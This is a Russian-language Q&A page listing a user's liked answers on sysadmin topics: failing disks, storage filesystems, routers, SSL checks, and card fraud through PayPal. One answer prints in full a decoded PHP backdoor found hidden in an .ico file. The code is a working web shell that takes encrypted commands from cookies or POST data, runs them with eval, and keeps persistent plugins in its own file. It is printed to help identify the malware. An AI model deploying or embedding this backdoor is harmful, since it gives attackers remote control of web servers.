Задать вопрос
athacker

athacker

Лайки

  • Время ответа HDD зашкаливает. Что делать с жестким диском?

    @ReSupport
    Серверы, кластеры, системы хранения данных.
    На скриншоте Victoria четко видно 5 ремапов. Значит диск разваливается, наверняка и кандидатов в ремапы немало.
    Сохраняйте ценную информацию и меняйте диск.
    Ответ написан
    5 комментариев
    5 комментариев

  • Это код вируса или нет?

    Rsa97
    @Rsa97
    Для правильного вопроса надо знать половину ответа
    А вы откройте этот .ico-файл в текстовом редакторе, там как раз зловред сидит.
    Если его расшифровать:
    @ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);


if(!defined("PHP_EOL"))
{
    define("PHP_EOL", "\n");
}

if(!defined("DIRECTORY_SEPARATOR"))
{
    define("DIRECTORY_SEPARATOR", "/");
}

if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
{
    define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);

    $data = NULL;
    $data_key = NULL;

    $GLOBALS['cs_auth'] = '58d0af46-4572-4890-a372-475116d44415';
    global $cs_auth;


    function cs_base64_decode($input) {

        if (strlen($input) < 4)
        {
            return "";
        }

        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

        $keys = str_split($keyStr);
        $keys = array_flip($keys);

        $i = 0;
        $output = "";

        $input = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $input);

        do {
            $enc1 = $keys[$input[$i++]];
            $enc2 = $keys[$input[$i++]];
            $enc3 = $keys[$input[$i++]];
            $enc4 = $keys[$input[$i++]];

            $chr1 = ($enc1 << 2) | ($enc2 >> 4);
            $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
            $chr3 = (($enc3 & 3) << 6) | $enc4;
            $output = $output . chr($chr1);
            if ($enc3 != 64) {
                $output = $output . chr($chr2);
            }
            if ($enc4 != 64) {
                $output = $output . chr($chr3);
            }
        } while ($i < strlen($input));
        return $output;
    }

    if (!function_exists('file_put_contents'))
    {
        function file_put_contents($n, $d, $flag = False)
        {
            $mode = $flag == 8 ? 'a' : 'w';
            $f = @fopen($n, $mode);
            if ($f === False)
            {
                return 0;
            }
            else
            {
                if (is_array($d)) $d = implode($d);
                $bytes_written = fwrite($f, $d);
                fclose($f);
                return $bytes_written;
            }
        }
    }

    if (!function_exists('file_get_contents'))
    {
        function file_get_contents($filename)
        {
            $fhandle = fopen($filename, "r");
            $fcontents = fread($fhandle, filesize($filename));
            fclose($fhandle);

            return $fcontents;
        }
    }
    function cs_get_current_filepath()
    {
        return trim(preg_replace("/\(.*\$/", '', __FILE__));
    }

    function cs_decrypt_phase($data, $key)
    {
        $out_data = "";

        for ($i=0; $i<strlen($data);)
        {
            for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
            {
                $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
            }
        }

        return $out_data;
    }

    function cs_decrypt($data, $key)
    {
        global $cs_auth;

        return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
    }
    function cs_encrypt($data, $key)
    {
        global $cs_auth;

        return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);
    }

    function cs_get_plugin_config()
    {
        $self_content = @file_get_contents(cs_get_current_filepath());

        $config_pos = strpos($self_content, md5(cs_get_current_filepath()));
        if ($config_pos !== FALSE)
        {
            $config = substr($self_content, $config_pos + 32);
            $plugins = @unserialize(cs_decrypt(rawurldecode($config), md5(cs_get_current_filepath())));
        }
        else
        {
            $plugins = Array();
        }

        return $plugins;
    }

    function cs_set_plugin_config($plugins)
    {
        $config_enc = rawurlencode(cs_encrypt(@serialize($plugins), md5(cs_get_current_filepath())));
        $self_content = @file_get_contents(cs_get_current_filepath());

        $config_pos = strpos($self_content, md5(cs_get_current_filepath()));
        if ($config_pos !== FALSE)
        {
            $config_old = substr($self_content, $config_pos + 32);
            $self_content = str_replace($config_old, $config_enc, $self_content);

        }
        else
        {
            $self_content = $self_content . "\n\n//" . md5(cs_get_current_filepath()) . $config_enc;
        }

        @file_put_contents(cs_get_current_filepath(), $self_content);
    }

    function cs_plugin_add($name, $base64_data)
    {
        $plugins = cs_get_plugin_config();

        $plugins[$name] = cs_base64_decode($base64_data);

        cs_set_plugin_config($plugins);
    }

    function cs_plugin_rem($name)
    {
        $plugins = cs_get_plugin_config();

        unset($plugins[$name]);

        cs_set_plugin_config($plugins);
    }

    function cs_plugin_load($name=NULL)
    {
        foreach (cs_get_plugin_config() as $pname=>$pcontent)
        {
            if ($name)
            {
                if (strcmp($name, $pname) == 0)
                {
                    eval($pcontent);
                    break;
                }
            }
            else
            {
                eval($pcontent);
            }
        }
    }

    foreach ($_COOKIE as $key=>$value)
    {
        $data = $value;
        $data_key = $key;
    }

    if (!$data)
    {
        foreach ($_POST as $key=>$value)
        {
            $data = $value;
            $data_key = $key;
        }
    }

    $data = @unserialize(cs_decrypt(cs_base64_decode($data), $data_key));

    if (isset($data['ak']) && $cs_auth==$data['ak'])
    {
        if ($data['a'] == 'i')
        {
            $i = Array(
                'pv' => @phpversion(),
                'sv' => '2.0-1',
                'ak' => $data['ak'],
            );
            echo @serialize($i);
            exit;
        }
        elseif ($data['a'] == 'e')
        {
            eval($data['d']);
        }
        elseif ($data['a'] == 'plugin')
        {
            if($data['sa'] == 'add')
            {
                cs_plugin_add($data['p'], $data['d']);
            }
            elseif($data['sa'] == 'rem')
            {
                cs_plugin_rem($data['p']);
            }
        }
        echo $data['ak'];
        exit();
    }

    cs_plugin_load();
}

    А строка комментария в конце кода - это плагины, которые он грузит.
    Ответ написан
    Комментировать
    Комментировать

  • Как открыть больше 65600 портов?

    gbg
    @gbg Куратор тега Linux
    Любые ответы на любые вопросы
    Дополнительный физический интерфейс не нужен, а вот дополнительный IP - в самый раз. На одном интерфейсе может находится несколько IP.
    Ответ написан
    Комментировать
    Комментировать

  • Как "завернуть" свое веб-приложение в формат виртуальной машины?

    @latush
    1) Берете виртуальную машину
    2) Ставите на нее систему
    3) Настраиваете веб-приложение
    4) Экспортируете в формат *.ovf, *.ova
    ...
    PROFIT
    Ответ написан
    3 комментария
    3 комментария

  • Какие файловые системы используются в очень больших хранилищах?

    @Wexter
    для локального хранилища zfs(вместо хард/софт рейда)/xfs/ext4, для распределённого ceph/glusterfs/gfs2
    Ответ написан
    Комментировать
    Комментировать

  • Как максимально ускорить компьютер?

    Jump
    @Jump Куратор тега Windows
    Системный администратор со стажем.
    Итак ноут со следующими характеристиками -
    • Процессор Intel Celeron Dual Core 2100 МГц Penryn (T3500) - не фонтан, но для офисной работы и интернета вполне достаточен.
    • Оперативная память: 2048 Мб DDR3-1066МГц - никуда не годится, с таким количеством памяти работать невозможно. Для комфортной работы нужно 8Гб памяти, для того чтобы хоть как-то работать без диких тормозов хотя бы 4Гб.
    • Жесткий диск: 320 Гб (5400 rpm), HDD - для комфортной работы с современной ОС нужен SSD, а HDD, да еще и 5400просто гарантирует наличие тормозов.


    Получается для получения вменяемого быстродействия нужно сделать две вещи -
    1)Добавить память - смотрим на сколько можно добавить физически и ставим 8 или хотя бы 4Гб
    2)Выкинуть HDD и поставить SSD.
    В итоге получится отличная офисная машинка, которая будет шустро работать еще достаточно приличное время.

    Процессор трогать не надо, там все ок, разве что почистить систему охлаждения - это иногда прилично повышает быстродействие процессора.
    Все остальные включая ОС - неважно.
    Оптимизировать ОС или менять - совершенно бессмысленная затея, пока не добавили памяти, и не поставили SSD.
    Ответ написан
    2 комментария
    2 комментария

  • Как проверить наличие ssl сертификата у подключения?

    2ord
    @2ord
    В программе не стоит это делать.
    Проверка действительности безопасного соединения осуществляется веб-сервером. В конфигурации сервера (nginx/apache/etc) нужно указать что некоторый API доступен только по HTTPS. Если попытаются обратиться по HTTP, то или отказать в соединении либо перенаправить на HTTPS.
    Nginx: https://serverfault.com/questions/250476/how-to-fo...
    Ответ написан
    Комментировать
    Комментировать

  • Какой способ выхода в сеть на работе вы используете: wi-fi от фирмы или свой (с сим карты)?

    CityCat4
    @CityCat4 Куратор тега Информационная безопасность
    Внимание! Изменился адрес почты!
    Постоянный VPN до дома. А дома постоянно шуршит комп и если мне что-то надо посмотреть личное - просто RDP на виртуалку. А вообще у нас люди WiFi используют.
    Ответ написан
    Комментировать
    Комментировать

  • Выбор СХД для esxi на HP Proliant DL580?

    @Tabletko
    никого не трогаю, починяю примус
    Совсем новичку не стоит таким заниматься. Цена ошибки очень высока. Обратитесь к интегратору или вендору вашего сервера за консультациями по этому вопросу.
    Ответ написан
    1 комментарий
    1 комментарий

  • Как считается сумма и аттрибуты пакетов в SAAS?

    dimonchik2013
    @dimonchik2013
    non progredi est regredi
    ообычное ценообразование
    + маркетинг

    плюс предположение о неполном использовании, умники, конечно, находятся, но эти исключения незаметны при мало мальском числе клиентов
    Ответ написан
    Комментировать
    Комментировать

  • Какая система лучше всего подходит для х86-роутера?

    CityCat4
    @CityCat4
    Внимание! Изменился адрес почты!
    "- А куда ты хочешь попасть? - спросил Кот
    - А все равно куда - ответила Алиса
    - Ну тогда все равно куда и идти..." (С)

    Если стоит конкретная задача - то и решайте ее в тех средствах, которые чаще всего используются для решения таких задач. У задачи всегда есть, например, бюджет. Не особо крупные конторы берут обычно в качестве роутера микротик, те ,что покрупнее - циску, идеология у них кстати очень похожа.
    Если хотите просто поизучать, как настроить роутер на UNIX - можно и несколько вариантов попробовать. Проблема здесь не столько в том, чтобы попробовать, сколько в дальнейшей применимости знаний. Скажем, пересесть с FreeBSD на CentOS - довольно просто. А вот с CentOS на Gentoo - уже посложнее будет. Есть безусловно некий общий массив знаний, но программный роутер обычно строится на базе обычного дистриба - и тут выбор дистриба имеет существенное значение.
    Ответ написан
    4 комментария
    4 комментария

  • Резервирование канала через 2 шлюза в одной подсети?

    martin74ua
    @martin74ua Куратор тега Сетевое администрирование
    Linux administrator
    vrrp
    Ответ написан
    Комментировать
    Комментировать

  • Строение провайдерской сети?

    karabanov
    @karabanov
    Системный администратор
    Ростелеком по разному умеет, но в основном для абонента выделяется отдельный VLAN и прокидывается по сети из порта в порт.
    Есть у Ротелекома и сеть СБА (сеть бизнес абонентов), там L2+ (VPLS, MPLS вот это всё).
    Ответ написан
    Комментировать
    Комментировать

  • Какую должность перспективней написать в трудовой книжке?

    Decadal
    @Decadal
    Вероятно, у вас какой-то особенный смысл для слова 'перспективы', но отечественная трудовая книжка и перспективы в IT вообще не связаны, на мой взгляд
    Ответ написан
    Комментировать
    Комментировать

  • Как понять. какой сервер шумит?

    vesper-bot
    @vesper-bot
    Любитель файрволлов
    Собираешь телеметрию (обороты вентиляторов, обороты жестких, но шуметь с периодичностью - скорее вентиляторы), обнаруживаешь вентилятор, который меняет скорость, отдаешь информацию наверх, забиваешь.
    Ответ написан
    Комментировать
    Комментировать

  • Как лучше хранить ключ шифрования?

    @0xC0CAC01A
    У меня для Вас плохая новость - строго говоря, никак, если без дополнительных аппаратных средств. И потом - что Вам даст зашифрованная БД, если её когда-то надо будет расшифровывать для работы сайта?
    Ответ написан
    Комментировать
    Комментировать

  • Как загрузить приложение полностью в ОЗУ, чтобы не пользоваться жестким диском в работе?

    @kmg4e
    Не поможет.

    Для проверки можете просто установить драйвер RAMDrive/RAMDisk. Этот драйвер позволяет создать диск, к примеру M:, который физически будет полностью размещен в оперативной памяти.

    Разместите на нем всю БД (внимание!!! при перезагрузке все потеряете!!! только для тестов!!! )
    Запустите и убедитесь, что сильно быстрее не стало.

    В описанной вами схеме нет необходимости, так как 1С во время работы не обращается ко всем данным. А обращается только к малой их части, которые нужны для повседневной работы.

    Структура БД 1С разработана с тем учетом, чтобы к примеру, остатки товаров/взаиморасчетов и пр. "кэшировались" в самой БД с помощью специальных записей (если не ошибаюсь, это происходит раз в месяц).

    Гораздо более полезной будет настройка СУБД, с целью заставить её использовать всю доступную оперативную память и регулярно обновлять статистику для планов запросов.

    UPD:
    Для 1С не нужно столько оперативки.
    Нужно более чтобы у процессора была больше частота. Даже число ядер если и меньше.
    Ответ написан
    5 комментариев
    5 комментариев

  • Как вести документацию по серверам (Сис.Администрирование)?

    CityCat4
    @CityCat4
    Внимание! Изменился адрес почты!
    redmine?

    UPD: Скрипты и конфиги - в VCS. VCS по вкусу :) redmine поддерживает все известные - svn, git, mercurial...
    Ответ написан
    Комментировать
    Комментировать

  • Как реализовать одновременную работу в сетях с совпадающими диапазонами?

    saboteur_kiev
    @saboteur_kiev Куратор тега Компьютерные сети
    software engineer
    Почему вы выбрали 170.x.x.x ? Почитайте какие адреса МОЖНО использовать в локалке, чтобы не было подобных конфликтов и перенастройте сеть:

    https://ru.wikipedia.org/wiki/%D0%A7%D0%B0%D1%81%D...
    Ответ написан
    11 комментариев
    11 комментариев

  • Ситуация с хищением денег с карты visa через paypal?

    Daemon23RUS
    @Daemon23RUS
    В милицию заявление пока не писала, потому что в банке заверили, что у них компетентные работники в этой сфере.
    В отношении Вас совершены противоправные действия, и первое куда надо обратиться (после звонка в банк о блокировании карты) это милиция. Она имеет право проводить следственные действия, и назначать экспертизы итд. (не будем обсуждать компетенцию, об этом позже).
    Еще написала много писем в paypal, описала ситуацию. Но до сих пор так никто и не ответил.
    Деятельность Пайпала на территории Вашей страны регулируется действующим законодательством. А значит Ваши права как потребителя так же охраняются законодательством. Пайпал оказывает услуги, а в Вашем случае это услуга PayPal ненадлежащего качества. Пишите претензию, копию отправляйте в контролирующий/надзорный орган (заказным письмом). Но Вы должны понимать, что конкретно в Вашей ситуации PayPal не причем, и не связан с Вами денежными обязательствами.
    25.04.2017 оплачена какая-то услуга по автоматизации прочтения новостей в интернете, офис которой находится в Нидерландах
    Не лишним будет связаться с этим поставщиком, сообщить ему о том что средства будут отозваны. И убедиться что поставщик услуг получил эту информацию. (в дальнейшем может пригодится)
    С банком общение стройте с позиции что Вы отзываете этот платеж, по ряду причин. Платеж инициирован третьими лицами, информация о карте стала доступна 3м лицам, в результате мошеннических действий (о чем имеется заявление в милицию) банком не была проведена процедура подтверждения 3DSecure, такая операция подразумевает, что в случае проблемы с платежом (а она как раз возникла) денежные средства отзываются.
    Что касается "расследования" безопасниками банка - банк чист, запрос пришел с пайпала и выполнен банком. Грубо говоря, это Ваша проблема с зоопарком вирусов на Вашем ноуте, банк за это ответственности не несет и ничего Вам не должен. К Пайпалу по поводу денег и регистрации левого аккаунта, тоже не докопаться, несуществующий емаил адрес - а что тут такого я сегодня создал - работает, завтра удалю, а послезавтра Вы уже мне не можете написать - адрес не существует. Поэтому надежда на возврат средств только положительное решние банка об отзыве операции.
    P.S. по ответам 1) athacker: Абсолютно верно сказал выключить ноут. Отдать экспертам когда потребуют.
    2) Стоит
    3) Антивирусник антивируснику рознь, и установленный антивирус не дает полной защиты. А учитывая что дети могут бесконтрольно использовать ноут, поставьте антивирусу пароль на ключевые операции.
    4) Постоянно ктото из знакомых моих знакомых попадает в подобные ситуации, То что я описал Выше - действия принесшие наибольший результат.
    Ответ написан
    Комментировать
    Комментировать